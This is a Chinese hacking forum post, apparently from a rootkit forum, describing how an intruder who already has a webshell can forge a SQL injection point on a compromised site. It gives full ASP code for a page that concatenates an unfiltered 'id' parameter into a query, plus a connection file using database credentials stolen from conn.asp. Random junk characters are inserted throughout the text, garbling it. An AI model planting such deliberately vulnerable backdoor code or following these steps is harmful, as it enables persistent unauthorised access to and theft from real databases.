自己构造注入点方便入侵0 z: y$ H; V n# P2 c
! i* J4 Y; D+ P+ {+ Z: [
今天看了rootkit论坛里面有人要我写出来关于伪造一个注入点,然后方便渗透,找到更多的可利用的信息: S; C7 Y; j4 a' N. S: O9 g
0 j4 \# \1 x6 t9 ]. N
这两天一直考试,想了下,就先仍出来,有什么问题可以提出来,我们一起讨论!
$ ~7 m3 e6 Z+ t
, Z1 T; D) r9 L首先你要拿了一个webshell,这样你找到连接数据库的文件,大多都是conn.asp这个文件里面有mssql的用户和
6 \* B% T1 o! t8 Q b2 u* R/ _
5 Q. K. w# O) _" I) k/ A密码,你要找到用户名、密码、数据库所在的IP,然后连接上去,至于连接大家应该都会,找到网站管理员的表
. U9 t& v4 Q+ G# ?- o7 h: N- _) j6 n% C# F. ?% I; E5 D
因为我测试的时候是用管理员的表,我朋友说任何表名都可以,只要这个表存在,代码如下:
( Y+ P, t K' }0 c1 e
7 b K( g" \2 d$ H D/ C, z: I程序代码& U1 e" f5 O1 b! x, X }" l7 p
<!--#include file="xx.asp"-->" b( |# s6 [" R
<%" m2 r# h7 a, l+ y8 i. L$ t, w5 E* f
set rs=server.createobject("ADODB.recordset")
8 y/ s! {; S! a" g6 Bid = request("id")
4 f g, ~9 ~0 i `4 N. HstrSQL = "select * from admin where id=" & id
; b0 h. W% W* i; {$ o5 V# `rs.open strSQL,conn,1,3
1 c; Z9 I6 T0 T8 N1 Q+ F: i, c6 Xrs.close+ [* _ s: i% s6 w3 j4 c8 G4 N: V8 E
%>. q: r5 F: k) `2 D8 e
3 I7 |7 O, F* L5 O; i0 d
把strSQL = "select * from admin where id=" & id 这句话里面的admin换成要伪造的表名,注意必须存在
. f3 @; E4 A4 e0 h4 B
0 N+ l6 V, [/ A8 G5 X1 Z- |你可以连接上去看下表名就是了!这里假设的是admin是表名!这个文件名随便保存!/ Z7 o; \3 i- d9 j' a$ ]
Q8 K, ?2 G2 e7 z5 E然后就要构造一个连接数据库的文件了,代码如下:
. `/ f0 V$ ?5 m程序代码' Z- o9 k1 \7 n v% p) y9 I* K* {: N
<% 5 Q0 S( x+ d8 M& }/ Y
strSQLServerName = "000.000.000.000" '服务器名称或地址
; q8 c; |( B6 M! E+ O- b2 d# D; A* r4 gstrSQLDBUserName = "sqlname" '数据库帐号% g! F4 ^! }/ m8 O' X9 T, C
strSQLDBPassword = "sqlpass" '数据库密码
/ j/ [! N3 X. Q" b; z. k# v: l+ ustrSQLDBName = "sqldataname" '数据库名称
* W Y% T( y9 Y. n1 T2 J6 S) jSet conn = Server.CreateObject("ADODB.Connection")/ ?2 |7 c8 V0 n( i7 e
strCon = " rovider=SQLOLEDB.1 ersist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & " assword=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"1 r6 {5 S. ]& b
conn.open strCon( \% ~' b# p% v/ ], K( U9 {
%>0 v, i3 F; B7 \9 Z4 n# L9 v
+ I; n/ f1 {, V1 y0 F. h这里应该都会了,就不罗嗦了,不过注意的是保存的文件名要和include调用的名字一样。。还是罗嗦话,+ _0 X7 z' ?' v* q# g
; X! u* j: [. T# o h
就这样,正常情况下,就OK了,伪造成功……
9 @. e+ m' _3 f! L8 V2 |1 ]4 V" z1 V
如果有什么问题可以提出来大家一起探讨解决。 |